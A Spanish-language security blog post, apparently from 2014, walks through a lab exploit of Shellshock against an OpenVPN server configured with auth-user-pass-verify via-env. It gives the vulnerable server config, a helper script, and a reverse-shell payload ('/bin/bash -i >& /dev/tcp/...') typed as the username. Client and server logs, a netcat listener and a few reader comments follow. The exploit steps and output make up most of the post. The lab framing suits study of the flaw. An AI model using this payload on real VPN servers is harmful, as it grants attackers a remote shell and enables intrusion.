Para empezar en nuestro laboratorio vamos a utilizar un par de máquinas virtuales con Kali Linux 1.0.6. Para ello lo importante será configurar el servidor OpenVPN con la opción auth-user-pass-verify y el método via-env que guardará el "username" y "password" en variables de entorno. Si conocéis ya Shellshock sabréis que esta práctica pone a OpenVPN en situación bastante peligrosa:
port 1194
proto udp
dev tun
client-cert-not-required
auth-user-pass-verify /etc/openvpn/user.sh via-env
tmp-dir "/etc/openvpn/tmp"
ca ca.crt
cert kali.crt
key kali.key # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
client-cert-not-required
plugin /usr/lib/openvpn/openvpn-auth-pam.so login
script-security 3
status openvpn-status.log
verb 3
Fijaros que al menos el nivel de script-security debe ser 3 para permitir llamar a ejecutables y scripts de usuario.
El siguiente paso será crear el fichero user.sh en /etc/openvpn/ (aseguraros que tienen los permisos de ejecución necesarios):
### user.sh
#!/bin/bash
echo "$username"
echo "$password"
Ahora iniciamos nuestro servidor OpenVPN vulnerable:
Después nos vamos a nuestra segunda máquina virtual y ponemos a escuchar un netcat:
Desde otra pestaña lanzamos el cliente openvpn:
Y añadimos nuestro payload como username y password:
() { :;};'/bin/bash -i >& /dev/tcp/10.71.7.90/4444 0>&1 &
Ya sabéis que podemos conectar a un socket usando Bash por medio de exec y redireccionado hacia/desde un pseudo-path /dev/tcp/<hostname>/<port> o /dev/udp/<hostname>/<port>.
Esto será lo que vemos en el cliente:
root@kali2:~# openvpn --client --remote 10.71.7.96 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo
Fri Oct 3 09:08:16 2014 OpenVPN 2.2.1 i486-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [eurephia] [MH] [PF_INET6] [IPv6 payload 20110424-2 (2.2RC2)] built on Jun 19 2013
Enter Auth Username:() { :;};/bin/bash -i >& /dev/tcp/10.71.7.90/4444 0>&1 &
Enter Auth Password:
Fri Oct 3 09:08:19 2014 IMPORTANT: OpenVPN's default port number is now 1194, based on an official port number assignment by IANA. OpenVPN 2.0-beta16 and earlier used 5000 as the default port.
Fri Oct 3 09:08:19 2014 WARNING: No server certificate verification method has been enabled. See http://openvpn.net/howto.html#mitm for more info.
Fri Oct 3 09:08:19 2014 NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables
Fri Oct 3 09:08:19 2014 LZO compression initialized
Fri Oct 3 09:08:19 2014 UDPv4 link local (bound): [undef]
Fri Oct 3 09:08:19 2014 UDPv4 link remote: [AF_INET]10.71.7.96:1194
Fri Oct 3 09:08:22 2014 [kali] Peer Connection Initiated with [AF_INET]10.71.7.96:1194
Fri Oct 3 09:08:24 2014 AUTH: Received AUTH_FAILED control message
Fri Oct 3 09:08:24 2014 SIGTERM[soft,auth-failure] received, process exiting
Y esto en el servidor:
root@kali:/etc/openvpn# openvpn server.conf
Fri Oct 3 09:08:07 2014 OpenVPN 2.2.1 i486-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [eurephia] [MH] [PF_INET6] [IPv6 payload 20110424-2 (2.2RC2)] built on Jun 19 2013
Fri Oct 3 09:08:07 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Fri Oct 3 09:08:07 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY
Fri Oct 3 09:08:07 2014 Diffie-Hellman initialized with 1024 bit key
Fri Oct 3 09:08:07 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate
Fri Oct 3 09:08:07 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Fri Oct 3 09:08:07 2014 Socket Buffers: R=[163840->131072] S=[163840->131072]
Fri Oct 3 09:08:07 2014 ROUTE default_gateway=10.71.7.1
Fri Oct 3 09:08:07 2014 TUN/TAP device tun0 opened
Fri Oct 3 09:08:07 2014 TUN/TAP TX queue length set to 100
Fri Oct 3 09:08:07 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Fri Oct 3 09:08:07 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
Fri Oct 3 09:08:07 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2
Fri Oct 3 09:08:07 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Fri Oct 3 09:08:07 2014 GID set to nogroup
Fri Oct 3 09:08:07 2014 UID set to nobody
Fri Oct 3 09:08:07 2014 UDPv4 link local (bound): [undef]
Fri Oct 3 09:08:07 2014 UDPv4 link remote: [undef]
Fri Oct 3 09:08:07 2014 MULTI: multi_init called, r=256 v=256
Fri Oct 3 09:08:07 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0
Fri Oct 3 09:08:07 2014 Initialization Sequence Completed
Fri Oct 3 09:08:19 2014 MULTI: multi_create_instance called
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 Re-using SSL/TLS context
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 LZO compression initialized
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 Local Options hash (VER=V4): '530fdded'
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 Expected Remote Options hash (VER=V4): '41690919'
Fri Oct 3 09:08:19 2014 10.71.7.90:1194 TLS: Initial packet from [AF_INET]10.71.7.90:1194, sid=b64ed4da e199b1c6
AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.71.7.90/4444 0>&1 &' failed to authenticate: Error in service module
Fri Oct 3 09:08:21 2014 10.71.7.90:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
Fri Oct 3 09:08:21 2014 10.71.7.90:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so
_________/bin/bash_-i____/dev/tcp/10.71.7.90/4444_0__1__
Fri Oct 3 09:08:21 2014 10.71.7.90:1194 TLS Auth Error: Auth Username/Password verification failed for peer
Fri Oct 3 09:08:21 2014 10.71.7.90:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA
Fri Oct 3 09:08:21 2014 10.71.7.90:1194 [] Peer Connection Initiated with [AF_INET]10.71.7.90:1194
Fri Oct 3 09:08:24 2014 10.71.7.90:1194 PUSH: Received control message: 'PUSH_REQUEST'
Fri Oct 3 09:08:24 2014 10.71.7.90:1194 Delayed exit in 5 seconds
Fri Oct 3 09:08:24 2014 10.71.7.90:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1)
Fri Oct 3 09:08:26 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
Fri Oct 3 09:08:29 2014 10.71.7.90:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting
Y el resultado en nuestro Netcat:
¡Es vulnerable!
Buen fin de semana y ser buenos!
Genial y que miedito!
ResponderEliminarPuto bash
ResponderEliminar¿y esto (me refiero al bug) supuestamente se descubre ahora despues de 15 años? me parto!
ResponderEliminareso es lo raro... ¿¿por qué ahora?? o se nos oculta algo o sobre-estimamos a los humanos (o al menos a la comunidad de seguridad informática)...
Eliminar